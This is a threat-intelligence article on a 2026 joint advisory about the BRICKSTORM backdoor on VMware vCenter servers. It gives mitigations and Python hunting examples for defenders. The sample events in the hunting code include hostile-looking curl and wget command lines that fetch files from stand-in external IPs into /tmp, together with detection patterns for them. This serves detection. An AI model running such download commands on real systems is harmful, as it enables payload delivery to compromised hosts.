CISA, NSA, and Canada Warn of New BRICKSTORM Malware Variant Used by Chinese Hackers

US and Canadian Agencies Update Advisory on BRICKSTORM Backdoor Used by PRC State-Sponsored Actors

HIGH
February 11, 2026
Malware · Threat Actor · Threat Intelligence

Related Entities

  • Threat Actors: People's Republic of China (PRC) state-sponsored actors
  • Products & Tech (Other): BRICKSTORM

Full Report

Executive Summary

On February 11, 2026, CISA, the NSA, and Canada's Cyber Centre (CCCS) issued a joint cybersecurity advisory (MAR-261234.c1.v1.CLEAR) detailing a new variant of the BRICKSTORM backdoor. This malware is attributed to state-sponsored threat actors from the People's Republic of China (PRC). The advisory is based on findings from an incident response investigation where the actors compromised a VMware vCenter Server to deploy the malware for long-term persistence. The update provides new indicators of compromise (IOCs) and detection rules to enable network defenders, particularly within government and critical infrastructure sectors, to hunt for and identify BRICKSTORM activity. The advisory underscores the persistent threat posed by PRC actors targeting critical enterprise management infrastructure.


Threat Overview

  • Threat Actor: People's Republic of China (PRC) state-sponsored actors.
  • Malware: BRICKSTORM, a custom backdoor designed for stealth and persistence.
  • Target: The advisory specifically calls out the compromise of a VMware vCenter Server, a high-value target that provides centralized management of virtualized infrastructure. Control over a vCenter server can grant an attacker sweeping access to an organization's entire server fleet.
  • Timeline: The advisory notes that in one confirmed incident, the threat actors gained initial access in April 2024 and remained persistent, with the new malware sample being the twelfth distinct version analyzed.
  • Objective: The primary goal of the BRICKSTORM malware is to establish and maintain long-term, covert access to victim networks for espionage or follow-on activities.

Technical Analysis

While the full technical details are in the official MAR, the context implies several key TTPs. The choice of a vCenter server as a host for the backdoor is strategically significant. These servers are often highly privileged, have extensive network access to ESXi hosts and virtual machines, and may not be monitored as rigorously as standard Windows servers.

By deploying BRICKSTORM on a vCenter appliance, the PRC actors can:

  1. Maintain Persistence: Survive reboots and system changes. This aligns with T1543.002 - Create or Modify System Process: Systemd Service if deployed on the Photon OS-based vCenter appliance.
  2. Evade Detection: Blend in with legitimate administrative traffic. The backdoor's C2 communication likely uses common web protocols like HTTPS to avoid suspicion, a hallmark of T1071.001 - Web Protocols.
  3. Enable Lateral Movement: From the vCenter server, attackers can easily move to any virtual machine in the environment, deploy additional tools, and access or exfiltrate vast amounts of data. This leverages the inherent trust and functionality of the vCenter platform.

The use of a twelfth variant indicates an active, ongoing development cycle, where the threat actors continuously modify their tools to evade signature-based detection, consistent with T1587.001 - Develop Capabilities: Malware.

MITRE ATT&CK Mapping


Impact Assessment

A compromise involving BRICKSTORM on a vCenter server is critical. It grants the attacker the 'keys to the kingdom' in a virtualized environment. The potential impact includes:

  • Widespread Data Exfiltration: Access to all data on all virtual machines managed by vCenter.
  • Ransomware Deployment: The ability to simultaneously deploy ransomware across hundreds or thousands of servers.
  • Infrastructure Sabotage: The power to delete or corrupt virtual machines, storage, and network configurations, causing catastrophic operational disruption.
  • Persistent Espionage: Long-term, undetected access to a network for intelligence gathering.

Given the targeting of government and critical infrastructure, the risk extends to national security.

Cyber Observables for Detection

While the MAR provides specific rules, security teams can proactively hunt for anomalous activity on vCenter servers:

| Type | Value | Description | Context |
| --- | --- | --- | --- |
| network_traffic_pattern | Outbound connections from vCenter to non-VMware IPs | vCenter servers should generally only communicate with ESXi hosts, domain controllers, and administrator workstations. Any other outbound traffic is highly suspicious. | Firewall logs, NetFlow data |
| process_name | vpxd, vsan-health | Monitor for unusual child processes being spawned by core vCenter services. | EDR on vCenter (if available), vCenter logs (/var/log/vmware/) |
| command_line_pattern | curl *, wget * | Any use of curl or wget on a vCenter appliance to download files from the internet is a major red flag. | Audit logs, command-line logging (Sysmon for Linux) |
| file_path | /tmp/, /var/tmp/ | Threat actors often drop payloads in temporary directories. Monitor for new executable files in these locations on vCenter appliances. | File integrity monitoring (FIM) |
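As an added example (not code from the advisory or this article), the host-based observables in the table above expressed as hunting logic and run over constructed sample events; the event field names, the expected-children map for core services, and the sample addresses (documentation ranges) are assumptions.

```python
import re

# Constructed sample events (not real vCenter logs). Fields mirror what an EDR or
# auditd-to-SIEM pipeline on a Photon OS vCenter appliance would typically provide.
SAMPLE_EVENTS = [
    {"host": "vcenter01", "parent": "vpxd", "process": "bash",
     "cmdline": "bash -c 'curl -s http://198.51.100.7/u -o /tmp/.x'"},
    {"host": "vcenter01", "parent": "systemd", "process": "vpxd",
     "cmdline": "/usr/lib/vmware-vpx/vpxd"},
    {"host": "vcenter01", "parent": "vsan-health", "process": "python",
     "cmdline": "python /usr/lib/vmware-vsan/health.py"},
    {"host": "vcenter01", "event": "file_create", "path": "/tmp/.x", "mode": 0o755},
    {"host": "vcenter01", "event": "file_create",
     "path": "/var/log/vmware/vpxd/vpxd.log", "mode": 0o644},
    {"host": "vcenter01", "parent": "sshd", "process": "wget",
     "cmdline": "wget https://203.0.113.9/a.tgz"},
]

CORE_SERVICES = {"vpxd", "vsan-health"}
# Children that core services are expected to spawn (assumption; tune to your baseline).
EXPECTED_CHILDREN = {"vpxd": set(), "vsan-health": {"python"}}
# curl/wget as a standalone word at the start or after a shell separator/quote.
DOWNLOADER_RE = re.compile(r"(^|[\s;&|'\"])(curl|wget)(\s|$)")
TMP_DIRS = ("/tmp/", "/var/tmp/")


def hunt(events):
    """Return (observable_type, detail) findings matching the table's four observables."""
    findings = []
    for e in events:
        if e.get("event") == "file_create":
            # file_path: new executable (any execute bit) under a temp directory
            if e["path"].startswith(TMP_DIRS) and e["mode"] & 0o111:
                findings.append(("file_path", e["path"]))
            continue
        cmd = e.get("cmdline", "")
        # command_line_pattern: curl/wget on the appliance
        if DOWNLOADER_RE.search(cmd):
            findings.append(("command_line_pattern", cmd))
        # process_name: core vCenter service spawning an unexpected child
        parent = e.get("parent")
        if parent in CORE_SERVICES and e["process"] not in EXPECTED_CHILDREN[parent]:
            findings.append(("process_name", f"{parent} -> {e['process']}"))
    return findings


if __name__ == "__main__":
    for kind, detail in hunt(SAMPLE_EVENTS):
        print(f"{kind:22} {detail}")
```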

Detection & Response

  • Deploy Provided Signatures: Immediately import and enable the YARA and Sigma rules from MAR-261234.c1.v1.CLEAR in your SIEM, EDR, and threat hunting platforms.
  • Analyze vCenter Logs: Scrutinize vCenter server logs for unauthorized logins, configuration changes, or API access from unknown IP addresses. Forward these logs to a central SIEM for correlation.
  • Monitor Network Traffic: Implement network traffic analysis focused on your vCenter management network. Baseline normal traffic patterns and alert on any deviations, especially outbound connections to the internet.
  • D3FEND Techniques: Utilize D3-NTA: Network Traffic Analysis to detect anomalous C2 traffic from the vCenter server. Apply D3-SFA: System File Analysis by running the provided YARA rules against the vCenter filesystem.

Mitigation

  1. Harden vCenter Servers: Restrict access to the vCenter management interface to a dedicated and isolated management network. Do not expose it to the internet. Enforce MFA for all administrator accounts.
  2. Apply Principle of Least Privilege: Create granular roles and permissions within vCenter. Do not use a single, highly privileged account for all operations. This can limit an attacker's ability to move laterally even if they compromise an account.
  3. Network Segmentation: Isolate the vSphere/vCenter management network from the rest of the corporate and user networks. Strictly control and monitor all traffic entering and leaving this critical security zone.
  4. Regularly Audit vCenter: Perform regular audits of vCenter configurations, user accounts, and permissions. Look for unauthorized changes or dormant accounts that could be abused.

If any activity related to BRICKSTORM is detected, organizations are instructed to report the incident to CISA or their national CERT immediately.

Timeline of Events

  1. April 1, 2024: PRC state-sponsored actors gained initial access to a victim network, later deploying BRICKSTORM.
  2. February 11, 2026: CISA, NSA, and CCCS release an updated Malware Analysis Report on a new BRICKSTORM variant.
  3. February 11, 2026: This article was published.

MITRE ATT&CK Mitigations

  • Isolate the vCenter management network from general corporate and internet traffic to prevent initial access and contain post-compromise activity.
  • Enforce MFA on all vCenter administrator accounts to prevent unauthorized access even if credentials are compromised.
  • Audit (M1047, enterprise): Enable and centralize logging for vCenter servers and monitor for anomalous activity, such as logins from unexpected locations or unusual API calls.
  • Keep VMware vCenter Server and all related components fully patched to prevent exploitation of known vulnerabilities.

D3FEND Defensive Countermeasures

The compromise of a VMware vCenter Server, as seen with the BRICKSTORM malware, underscores the need for stringent network isolation. The vCenter management network, which includes the vCenter appliance and ESXi management interfaces (vmkernel ports), must be treated as a top-tier security zone. This network should be completely segregated from user, server, and internet-facing networks using VLANs and strict firewall access control lists (ACLs). All traffic to and from this management plane must be explicitly denied by default, with rules allowing only necessary communication, such as administrator access from a secure bastion host, DNS lookups to internal servers, and connections to domain controllers. Critically, all outbound internet access from the vCenter server must be blocked. This single control would have likely prevented the BRICKSTORM backdoor from establishing a connection to its external C2 server, rendering the malware inert.

To detect threats like BRICKSTORM, continuous network traffic analysis of the vCenter management network is essential. Deploy network sensors or leverage NetFlow/sFlow data from switches to build a baseline of normal vCenter communication patterns. Since vCenter traffic is typically predictable (e.g., communication with ESXi hosts on specific ports, AD/DNS traffic), any deviation is a strong indicator of compromise. Specifically, security teams should configure alerts for:

  1. Any attempt by the vCenter server to initiate a connection to an external IP address.
  2. Communication over non-standard ports or protocols.
  3. Large, unexpected data transfers originating from the vCenter server.
  4. Connections to known malicious domains or IP addresses using a threat intelligence feed.

This proactive monitoring provides a high-fidelity detection mechanism for backdoors that need to communicate externally for command and control.
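As an added example (not from the advisory or this article), the four alert conditions above applied to constructed NetFlow-style records: a baseline window teaches the detector which destination/port pairs and flow sizes are normal for the vCenter appliance, and a review window is checked against it. The vCenter address, internal ranges, threat-feed entry and volume factor are assumptions.

```python
import ipaddress
from collections import defaultdict

INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Constructed threat-intel entry (documentation-range address, not a real IoC).
THREAT_FEED = {"203.0.113.45"}

# Constructed flows exported from a known-good window: (dst, dport, bytes).
# 443/902 to ESXi hosts, 53 to internal DNS, 389 to a domain controller.
BASELINE_FLOWS = [("10.10.1.11", 443, 120_000), ("10.10.1.12", 443, 98_000),
                  ("10.10.1.11", 902, 40_000), ("10.10.0.2", 53, 300),
                  ("10.10.0.10", 389, 5_000)]
# Constructed flows from the window under review.
REVIEW_FLOWS = [("10.10.1.12", 443, 110_000), ("10.10.0.2", 53, 250),
                ("198.51.100.20", 443, 2_000),    # external destination
                ("10.10.1.11", 8443, 3_000),      # port never seen to this ESXi host
                ("10.10.1.11", 443, 9_000_000),   # far above the baseline volume
                ("203.0.113.45", 443, 1_500)]     # listed in the threat feed


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def build_baseline(flows):
    """Largest flow size seen per (dst, port) pair; the key set is the allowed peer/port list."""
    peak = defaultdict(int)
    for dst, port, nbytes in flows:
        peak[(dst, port)] = max(peak[(dst, port)], nbytes)
    return dict(peak)


def review(flows, baseline, volume_factor=10):
    """Return (alert, dst, port) for each flow that deviates from the baseline."""
    alerts = []
    for dst, port, nbytes in flows:
        if dst in THREAT_FEED:                      # 4) threat-intel match
            alerts.append(("threat_intel_match", dst, port))
        elif not is_internal(dst):                  # 1) outbound to external address
            alerts.append(("external_destination", dst, port))
        elif (dst, port) not in baseline:           # 2) unbaselined peer/port
            alerts.append(("unbaselined_port", dst, port))
        elif nbytes > volume_factor * baseline[(dst, port)]:  # 3) large transfer
            alerts.append(("large_transfer", dst, port))
    return alerts


if __name__ == "__main__":
    for alert in review(REVIEW_FLOWS, build_baseline(BASELINE_FLOWS)):
        print(alert)
```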

Sources & References

Article Author

Jason Gomes


• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.


Tags: BRICKSTORM, Malware, Backdoor, China, APT, VMware, vCenter, CISA
